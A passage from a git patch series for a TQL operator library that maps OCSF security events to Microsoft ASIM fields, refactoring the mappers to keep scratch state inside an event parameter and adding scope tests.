microsoft/operators/asim/ocsf/group_management.tql | 2 +- microsoft/operators/asim/ocsf/http_activity.tql | 2 +- microsoft/operators/asim/ocsf/network_activity.tql | 2 +- microsoft/operators/asim/ocsf/process_activity.tql | 2 +- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 2 +- microsoft/operators/asim/ocsf/windows_service_activity.tql | 2 +- 17 files changed, 16 insertions(+), 16 deletions(-) rename microsoft/operators/asim/ocsf/{helpers => }/common.tql (100%) diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index d58c398..b865000 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 3001 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.user_management" asim.EventSchema = "UserManagement" diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index dadfca1..72bd312 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 3002 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.authentication" asim.EventSchema = "Authentication" diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index ac4537a..18f460f 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 3003 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.authentication" asim.EventSchema = "Authentication" diff --git a/microsoft/operators/asim/ocsf/helpers/common.tql b/microsoft/operators/asim/ocsf/common.tql similarity index 100% rename from microsoft/operators/asim/ocsf/helpers/common.tql rename to microsoft/operators/asim/ocsf/common.tql diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index c392f25..901f1e2 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 2003 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.alert_event" asim.EventSchema = "AlertEvent" diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 4fc1a17..4721bdb 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -26,7 +26,7 @@ let $threat_categories = { worm: "Worm", } -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.alert_event" asim.EventSchema = "AlertEvent" diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 5b8b90a..8f0c046 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 4004 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.dhcp_event" asim.EventSchema = "DhcpEvent" diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index b96d045..8f3a986 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 4003 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.dns" asim.EventSchema = "Dns" diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 01aae60..96d4d1c 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 3004 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.audit_event" asim.EventSchema = "AuditEvent" diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index cd93063..8b5f78d 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 1008 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.audit_event" asim.EventSchema = "AuditEvent" diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 198c644..c271c3b 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 1001 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.file_event" asim.EventSchema = "FileEvent" diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 696296e..5213151 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 3006 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.user_management" asim.EventSchema = "UserManagement" diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index a8bde76..8fa63bd 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 4002 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.web_session" asim.EventSchema = "WebSession" diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 8bc833f..72f855a 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 4001 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.network_session" asim.EventSchema = "NetworkSession" diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 8294f0a..bfb9786 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 1007 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.process_event" asim.EventSchema = "ProcessEvent" diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 731782f..4f93119 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 1006 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.audit_event" asim.EventSchema = "AuditEvent" diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 6c02cd3..333b731 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -11,7 +11,7 @@ assert $event.class_uid == 201004 ocsf = $event -microsoft::asim::ocsf::helpers::common +microsoft::asim::ocsf::common @name = "asim.audit_event" asim.EventSchema = "AuditEvent" From 1cdbfc10f81daa53b9d30f5e36e77daa49327529 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Fri, 12 Jun 2026 12:46:35 +0200 Subject: [PATCH 26/27] Keep mapper scratch inside event Route ASIM, Graph, and Windows mapping scratch state through the explicit event parameter instead of top-level temporary fields. This keeps nested mapping calls from leaking ocsf, asim, graph, or windows records into the caller scope. Add scope regressions that map nested payloads and assert the outer fields remain untouched. Assisted-by: GPT-5 (Codex) --- .../operators/asim/ocsf/account_change.tql | 70 ++++---- .../operators/asim/ocsf/authentication.tql | 84 +++++----- .../operators/asim/ocsf/authorize_session.tql | 80 +++++----- microsoft/operators/asim/ocsf/common.tql | 123 ++++++++------- .../asim/ocsf/compliance_finding.tql | 52 +++--- .../operators/asim/ocsf/detection_finding.tql | 52 +++--- .../operators/asim/ocsf/dhcp_activity.tql | 28 ++-- .../operators/asim/ocsf/dns_activity.tql | 36 ++--- .../operators/asim/ocsf/entity_management.tql | 62 ++++---- .../asim/ocsf/event_log_activity.tql | 62 ++++---- .../asim/ocsf/file_system_activity.tql | 54 +++---- .../operators/asim/ocsf/group_management.tql | 62 ++++---- .../operators/asim/ocsf/http_activity.tql | 24 +-- .../operators/asim/ocsf/network_activity.tql | 44 +++--- .../operators/asim/ocsf/process_activity.tql | 42 ++--- .../asim/ocsf/scheduled_job_activity.tql | 62 ++++---- .../asim/ocsf/windows_service_activity.tql | 62 ++++---- microsoft/operators/graph/ocsf/base.tql | 17 +- ...ompliance_policy_setting_state_summary.tql | 55 ++++--- .../graph/ocsf/events/defender_alert.tql | 87 +++++----- .../graph/ocsf/events/defender_incident.tql | 131 +++++++-------- .../graph/ocsf/events/detected_app.tql | 43 ++--- .../graph/ocsf/events/directory_audit.tql | 141 +++++++++-------- .../graph/ocsf/events/managed_device.tql | 77 ++++----- .../graph/ocsf/events/risk_detection.tql | 75 +++++---- .../graph/ocsf/events/risky_user.tql | 51 +++--- .../operators/graph/ocsf/events/sign_in.tql | 149 +++++++++--------- microsoft/operators/graph/ocsf/map.tql | 43 +++-- microsoft/operators/windows/ocsf/base.tql | 13 +- .../windows/ocsf/events/account_change.tql | 31 ++-- .../ocsf/events/application_crash_report.tql | 33 ++-- .../windows/ocsf/events/application_error.tql | 35 ++-- .../windows/ocsf/events/application_hang.tql | 33 ++-- .../windows/ocsf/events/authorize_session.tql | 27 ++-- .../windows/ocsf/events/defender_asr.tql | 55 ++++--- .../ocsf/events/defender_detection.tql | 75 +++++---- .../ocsf/events/defender_signature_update.tql | 15 +- .../windows/ocsf/events/defender_tamper.tql | 23 +-- .../windows/ocsf/events/defender_threat.tql | 59 +++---- .../windows/ocsf/events/eventlog_clear.tql | 27 ++-- .../windows/ocsf/events/eventlog_start.tql | 17 +- .../windows/ocsf/events/eventlog_stop.tql | 17 +- .../ocsf/events/explicit_credential_logon.tql | 51 +++--- .../windows/ocsf/events/group_management.tql | 41 ++--- .../ocsf/events/kerberos_preauth_failed.tql | 31 ++-- .../ocsf/events/kerberos_service_ticket.tql | 37 +++-- .../operators/windows/ocsf/events/logon.tql | 51 +++--- .../windows/ocsf/events/logon_failed.tql | 49 +++--- .../windows/ocsf/events/ntlm_auth.tql | 29 ++-- .../windows/ocsf/events/powershell_error.tql | 37 +++-- .../ocsf/events/powershell_module_logging.tql | 17 +- .../ocsf/events/powershell_script_block.tql | 29 ++-- .../powershell_script_block_invocation.tql | 23 +-- .../windows/ocsf/events/process_create.tql | 51 +++--- .../ocsf/events/scheduled_task_create.tql | 29 ++-- .../windows/ocsf/events/service_crashed.tql | 21 ++- .../windows/ocsf/events/service_install.tql | 33 ++-- .../ocsf/events/service_install_scm.tql | 23 +-- .../windows/ocsf/events/task_lifecycle.tql | 21 ++- .../windows/ocsf/events/task_run.tql | 51 +++--- microsoft/operators/windows/ocsf/map.tql | 106 ++++++------- microsoft/tests/asim/scope.tql | 32 ++++ microsoft/tests/asim/scope.txt | 38 +++++ microsoft/tests/graph/ocsf/scope.tql | 38 +++++ microsoft/tests/graph/ocsf/scope.txt | 6 + microsoft/tests/ocsf/scope-windows.tql | 11 ++ microsoft/tests/ocsf/scope-windows.txt | 6 + 67 files changed, 1765 insertions(+), 1424 deletions(-) create mode 100644 microsoft/tests/asim/scope.tql create mode 100644 microsoft/tests/asim/scope.txt create mode 100644 microsoft/tests/graph/ocsf/scope.tql create mode 100644 microsoft/tests/graph/ocsf/scope.txt create mode 100644 microsoft/tests/ocsf/scope-windows.tql create mode 100644 microsoft/tests/ocsf/scope-windows.txt diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index b865000..5b79004 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -7,48 +7,48 @@ args: type: field --- -assert $event.class_uid == 3001 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 3001 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.user_management" -asim.EventSchema = "UserManagement" -asim.EventSchemaVersion = "0.1.2" -asim.EventSeverity = asim.EventSeverity? else "Informational" -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.EventSchema = "UserManagement" +$event.asim.EventSchemaVersion = "0.1.2" +$event.asim.EventSeverity = $event.asim.EventSeverity? else "Informational" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true -match ocsf.activity_name { - "Create" => { asim.EventType = "UserCreated" } - "Delete" => { asim.EventType = "UserDeleted" } - "Update" => { asim.EventType = "UserModified" } - "Lock" => { asim.EventType = "UserLocked" } - "Unlock" => { asim.EventType = "UserUnlocked" } - "Disable" => { asim.EventType = "UserDisabled" } - "Enable" => { asim.EventType = "UserEnabled" } - "Password Change" => { asim.EventType = "PasswordChanged" } - "Password Reset" => { asim.EventType = "PasswordReset" } - _ => { asim.EventType = "UserModified" } +match $event.ocsf.activity_name { + "Create" => { $event.asim.EventType = "UserCreated"} + "Delete" => { $event.asim.EventType = "UserDeleted"} + "Update" => { $event.asim.EventType = "UserModified"} + "Lock" => { $event.asim.EventType = "UserLocked"} + "Unlock" => { $event.asim.EventType = "UserUnlocked"} + "Disable" => { $event.asim.EventType = "UserDisabled"} + "Enable" => { $event.asim.EventType = "UserEnabled"} + "Password Change" => { $event.asim.EventType = "PasswordChanged"} + "Password Reset" => { $event.asim.EventType = "PasswordReset"} + _ => { $event.asim.EventType = "UserModified"} } -asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? -if ocsf.user?.domain? != null and ocsf.user?.name? != null { - asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" - asim.TargetUsernameType = "Windows" +$event.asim.TargetUsername = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.user?.uid? +if $event.ocsf.user?.domain? != null and $event.ocsf.user?.name? != null { + $event.asim.TargetUsername = f"{$event.ocsf.user.domain}\\{$event.ocsf.user.name}" + $event.asim.TargetUsernameType = "Windows" } -asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true -asim.GroupName = ocsf.group?.name? -asim.GroupId = ocsf.group?.uid? -asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.SrcHostname = ocsf.src_endpoint?.hostname? +$event.asim.TargetUserId = $event.ocsf.user?.uid? +$event.asim.TargetUserIdType = "SID" if $event.asim.TargetUserId?.starts_with("S-") == true +$event.asim.GroupName = $event.ocsf.group?.name? +$event.asim.GroupId = $event.ocsf.group?.uid? +$event.asim.GroupIdType = "SID" if $event.asim.GroupId?.starts_with("S-") == true +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 72bd312..cf3d9e9 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -7,61 +7,61 @@ args: type: field --- -assert $event.class_uid == 3002 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 3002 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.authentication" -asim.EventSchema = "Authentication" -asim.EventSchemaVersion = "0.1.4" -match ocsf.activity_name { - "Logoff" => { asim.EventType = "Logoff" } - _ => { asim.EventType = "Logon" } +$event.asim.EventSchema = "Authentication" +$event.asim.EventSchemaVersion = "0.1.4" +match $event.ocsf.activity_name { + "Logoff" => { $event.asim.EventType = "Logoff"} + _ => { $event.asim.EventType = "Logon"} } -match ocsf.logon_type? { - "System" => { asim.EventSubType = "System" } +match $event.ocsf.logon_type? { + "System" => { $event.asim.EventSubType = "System"} "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { - asim.EventSubType = "Interactive" + $event.asim.EventSubType = "Interactive" } - "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" } + "Network" | "Network Cleartext" => { $event.asim.EventSubType = "Remote"} "Remote Interactive" | "Cached Remote Interactive" => { - asim.EventSubType = "RemoteInteractive" + $event.asim.EventSubType = "RemoteInteractive" } - "OS Service" => { asim.EventSubType = "Service" } + "OS Service" => { $event.asim.EventSubType = "Service"} _ => {} } -if ocsf.logon_type? != null { - asim.EventOriginalSubType = ocsf.logon_type +if $event.ocsf.logon_type? != null { + $event.asim.EventOriginalSubType = $event.ocsf.logon_type } -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true -asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? -asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? -if ocsf.user?.domain? != null and ocsf.user?.name? != null { - asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" - asim.TargetUsernameType = "Windows" - asim.TargetDomain = ocsf.user.domain - asim.TargetDomainType = "Windows" +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true +$event.asim.ActorSessionId = $event.ocsf.actor?.session?.uid? else $event.ocsf.actor?.session?.uid_alt? +$event.asim.TargetUsername = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.user?.uid? +if $event.ocsf.user?.domain? != null and $event.ocsf.user?.name? != null { + $event.asim.TargetUsername = f"{$event.ocsf.user.domain}\\{$event.ocsf.user.name}" + $event.asim.TargetUsernameType = "Windows" + $event.asim.TargetDomain = $event.ocsf.user.domain + $event.asim.TargetDomainType = "Windows" } -asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true -asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.SrcHostname = ocsf.src_endpoint?.hostname? -asim.SrcPortNumber = ocsf.src_endpoint?.port? -asim.TargetHostname = ocsf.dst_endpoint?.hostname? else ocsf.device?.hostname? -asim.TargetAppId = ocsf.service?.uid? else ocsf.dst_endpoint?.uid? -asim.TargetAppName = ocsf.service?.name? else ocsf.dst_endpoint?.svc_name? -asim.LogonProtocol = ocsf.auth_protocol? -if ocsf.auth_factors? != null { - asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? +$event.asim.TargetUserId = $event.ocsf.user?.uid? +$event.asim.TargetUserIdType = "SID" if $event.asim.TargetUserId?.starts_with("S-") == true +$event.asim.TargetSessionId = $event.ocsf.session?.uid? else $event.ocsf.session?.uid_alt? +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname? +$event.asim.SrcPortNumber = $event.ocsf.src_endpoint?.port? +$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname? else $event.ocsf.device?.hostname? +$event.asim.TargetAppId = $event.ocsf.service?.uid? else $event.ocsf.dst_endpoint?.uid? +$event.asim.TargetAppName = $event.ocsf.service?.name? else $event.ocsf.dst_endpoint?.svc_name? +$event.asim.LogonProtocol = $event.ocsf.auth_protocol? +if $event.ocsf.auth_factors? != null { + $event.asim.LogonMethod = $event.ocsf.auth_factors[0]?.factor_type? } -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 18f460f..419c743 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -7,58 +7,58 @@ args: type: field --- -assert $event.class_uid == 3003 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 3003 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.authentication" -asim.EventSchema = "Authentication" -asim.EventSchemaVersion = "0.1.4" -asim.EventType = "Elevate" -match ocsf.logon_type? { - "System" => { asim.EventSubType = "System" } +$event.asim.EventSchema = "Authentication" +$event.asim.EventSchemaVersion = "0.1.4" +$event.asim.EventType = "Elevate" +match $event.ocsf.logon_type? { + "System" => { $event.asim.EventSubType = "System"} "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { - asim.EventSubType = "Interactive" + $event.asim.EventSubType = "Interactive" } - "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" } + "Network" | "Network Cleartext" => { $event.asim.EventSubType = "Remote"} "Remote Interactive" | "Cached Remote Interactive" => { - asim.EventSubType = "RemoteInteractive" + $event.asim.EventSubType = "RemoteInteractive" } - "OS Service" => { asim.EventSubType = "Service" } + "OS Service" => { $event.asim.EventSubType = "Service"} _ => {} } -if ocsf.logon_type? != null { - asim.EventOriginalSubType = ocsf.logon_type +if $event.ocsf.logon_type? != null { + $event.asim.EventOriginalSubType = $event.ocsf.logon_type } -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true -asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? -asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? -if ocsf.user?.domain? != null and ocsf.user?.name? != null { - asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" - asim.TargetUsernameType = "Windows" - asim.TargetDomain = ocsf.user.domain - asim.TargetDomainType = "Windows" +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true +$event.asim.ActorSessionId = $event.ocsf.actor?.session?.uid? else $event.ocsf.actor?.session?.uid_alt? +$event.asim.TargetUsername = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.user?.uid? +if $event.ocsf.user?.domain? != null and $event.ocsf.user?.name? != null { + $event.asim.TargetUsername = f"{$event.ocsf.user.domain}\\{$event.ocsf.user.name}" + $event.asim.TargetUsernameType = "Windows" + $event.asim.TargetDomain = $event.ocsf.user.domain + $event.asim.TargetDomainType = "Windows" } -asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true -asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.SrcHostname = ocsf.src_endpoint?.hostname? -asim.SrcPortNumber = ocsf.src_endpoint?.port? -asim.TargetHostname = ocsf.dst_endpoint?.hostname? else ocsf.device?.hostname? -asim.TargetAppId = ocsf.service?.uid? else ocsf.dst_endpoint?.uid? -asim.TargetAppName = ocsf.service?.name? else ocsf.dst_endpoint?.svc_name? -asim.LogonProtocol = ocsf.auth_protocol? -if ocsf.auth_factors? != null { - asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? +$event.asim.TargetUserId = $event.ocsf.user?.uid? +$event.asim.TargetUserIdType = "SID" if $event.asim.TargetUserId?.starts_with("S-") == true +$event.asim.TargetSessionId = $event.ocsf.session?.uid? else $event.ocsf.session?.uid_alt? +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname? +$event.asim.SrcPortNumber = $event.ocsf.src_endpoint?.port? +$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname? else $event.ocsf.device?.hostname? +$event.asim.TargetAppId = $event.ocsf.service?.uid? else $event.ocsf.dst_endpoint?.uid? +$event.asim.TargetAppName = $event.ocsf.service?.name? else $event.ocsf.dst_endpoint?.svc_name? +$event.asim.LogonProtocol = $event.ocsf.auth_protocol? +if $event.ocsf.auth_factors? != null { + $event.asim.LogonMethod = $event.ocsf.auth_factors[0]?.factor_type? } -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/common.tql b/microsoft/operators/asim/ocsf/common.tql index bc61f84..7a5a597 100644 --- a/microsoft/operators/asim/ocsf/common.tql +++ b/microsoft/operators/asim/ocsf/common.tql @@ -1,114 +1,117 @@ --- description: Initializes shared ASIM fields from a validated OCSF event. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -asim = {} +$event.asim.EventCount = 1 +$event.asim.EventStartTime = $event.ocsf.start_time? else $event.ocsf.time +$event.asim.EventEndTime = $event.ocsf.end_time? else $event.ocsf.time +$event.asim.EventProduct = $event.ocsf.metadata?.product?.name? else $event.ocsf.metadata?.product?.feature?.name? else "Unknown" +$event.asim.EventVendor = $event.ocsf.metadata?.product?.vendor_name? else "Microsoft" -asim.EventCount = 1 -asim.EventStartTime = ocsf.start_time? else ocsf.time -asim.EventEndTime = ocsf.end_time? else ocsf.time -asim.EventProduct = ocsf.metadata?.product?.name? else ocsf.metadata?.product?.feature?.name? else "Unknown" -asim.EventVendor = ocsf.metadata?.product?.vendor_name? else "Microsoft" - -if ocsf.metadata?.original_event_uid? != null { - asim.EventOriginalUid = ocsf.metadata.original_event_uid - asim.EventUid = ocsf.metadata.original_event_uid +if $event.ocsf.metadata?.original_event_uid? != null { + $event.asim.EventOriginalUid = $event.ocsf.metadata.original_event_uid + $event.asim.EventUid = $event.ocsf.metadata.original_event_uid } -if ocsf.metadata?.event_code? != null { - asim.EventOriginalType = ocsf.metadata.event_code +if $event.ocsf.metadata?.event_code? != null { + $event.asim.EventOriginalType = $event.ocsf.metadata.event_code } else { - asim.EventOriginalType = ocsf.type_uid.string() + $event.asim.EventOriginalType = $event.ocsf.type_uid.string() } -if ocsf.message? != null { - asim.EventMessage = ocsf.message +if $event.ocsf.message? != null { + $event.asim.EventMessage = $event.ocsf.message } -match ocsf.severity_id? { +match $event.ocsf.severity_id? { 1 => { - asim.EventSeverity = "Informational" + $event.asim.EventSeverity = "Informational" } 2 => { - asim.EventSeverity = "Low" + $event.asim.EventSeverity = "Low" } 3 => { - asim.EventSeverity = "Medium" + $event.asim.EventSeverity = "Medium" } 4 => { - asim.EventSeverity = "High" + $event.asim.EventSeverity = "High" } 5 => { - asim.EventSeverity = "High" - asim.EventOriginalSeverity = ocsf.severity? else "Critical" + $event.asim.EventSeverity = "High" + $event.asim.EventOriginalSeverity = $event.ocsf.severity? else 